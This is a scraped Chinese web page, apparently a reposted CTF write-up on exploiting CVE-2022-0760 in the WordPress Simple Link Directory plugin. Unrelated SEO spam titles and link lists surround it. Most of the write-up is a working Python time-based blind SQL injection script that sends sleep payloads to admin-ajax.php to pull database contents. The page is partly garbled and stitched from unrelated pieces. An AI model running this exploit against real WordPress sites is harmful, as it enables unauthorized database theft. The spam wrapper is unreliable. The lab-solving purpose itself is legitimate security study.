当前位置: 首页 > news >正文

网站建设推广的软文做网站的服务器多少钱一年

网站建设推广的软文,做网站的服务器多少钱一年,网站开发系统源代码,南京seo顾问CVE-2022-0760 NSS [HNCTF 2022 WEEK2]ohmywordpress 【CVE-2022-0760】 题目描述#xff1a;flag在数据库里面。 开题#xff1a; 顺着按钮一直点下去会发现出现一个按钮叫安装WordPress 安装完之后的界面#xff0c;有一个搜索框。 F12看看network。 又出现了这个Wor…CVE-2022-0760 NSS [HNCTF 2022 WEEK2]ohmywordpress 【CVE-2022-0760】 题目描述flag在数据库里面。 开题 顺着按钮一直点下去会发现出现一个按钮叫安装WordPress 安装完之后的界面有一个搜索框。 F12看看network。 又出现了这个WordPress从源码中看出版本是6.0.2。 网上一番搜索找到一个cveCVE-2022-0760。当WordPress的插件Simple Link Directory版本 7.7.2时候存在时间盲注。 查看源码这里确实运用的这个插件但是看不到版本。 估计就是这个CVE那就直接上盲注脚本。 import requests import timeurl http://node5.anna.nssctf.cn:28982/wp-admin/admin-ajax.phpresult for i in range(1, 100):length len(result)for o in range(32, 128):data {action: qcopd_upvote_action,# post_id: f(SELECT 3 FROM (select if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1)){o},sleep(3),0))enz),# post_id: f(SELECT 3 FROM (select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasubstr((select group_concat(schema_name) from information_schema.schemata),26,11)),{i},1)){o},sleep(3),0))enz),post_id: f(SELECT 3 FROM (select if(ascii(substr((select group_concat(a) from (select 1 as a union select * from ctftraining.flag)b),{i},1)){o},sleep(3),0))enz),}time1 time.time()res requests.post(url, datadata)time2 time.time()# print(time2 - time1)# exit()if time2 - time1 3:result chr(o)print(result)breakif len(result) length:break为什么这样写脚本漏洞利用在下面文章里面能找到。 参考文章 NSFOCUS绿盟科技 [Simple Link Directory 7.7.2 - Unauthenticated SQL injection WordPress Security Vulnerability (wpscan.com)](
http://www.hkea.cn/news/14581676/

相关文章:

  • 怎么建企业自己的网站吗长春模板网站建设企业
  • 建设网站 深圳wordpress自适应设置宽度
  • 做电影网站多少钱为女友做网站
  • 常州网站建设推广公司繁峙做网站建设
  • 做电商讲师课程的网站centos。wordpress
  • 网站文化建设wordpress 修改目录权限
  • 谷歌地图网站代码化妆品网站网页设计
  • 网站开发设计新闻界面网站建设规章制度
  • 湛江网站开发哪家专业做网站多少宽带够
  • 常见的网站结构类型招商网官网平台
  • 学网站建设培训机构自己做影视网站
  • 做外贸一般去什么网站找客户视频网站后台设计
  • 帮网站做关键词排名优化云南省建设工程标准定额网站
  • 网站后台数据库设计购物网站
  • 昆明做网站建设的公司ppt模板免费下载 素材红色
  • 网站 二次开发怎么做wap网站用什么开发
  • vps建设网站别人访问不了2023国内外重大新闻事件10条
  • 电子商务网站 备案广州增城做网站
  • 洛阳做网站公司哪家好手机网站模版
  • 百度站长工具链接提交网站服务器空间不足
  • 网站建设未来发展的趋势asp网站开发软件
  • 网站开发大概价格天津做网站找津坤科技
  • 公司两个网站如何都备案自己的ip做网站
  • 在360网站做公告怎么弄酒店设计公司排名前十强
  • 辽宁省建设工程信息网站wordpress 媒体库外链
  • 网站 建设意见义乌论坛网站建设
  • 手机网站左右滑动效果站长平台怎么添加网站
  • 做问卷调查的网站挣钱唐山市住房与城乡建设厅网站
  • 网站建设果麦科技做外贸哪个网站最容易上手
  • 做品牌网站公司营销运营推广服务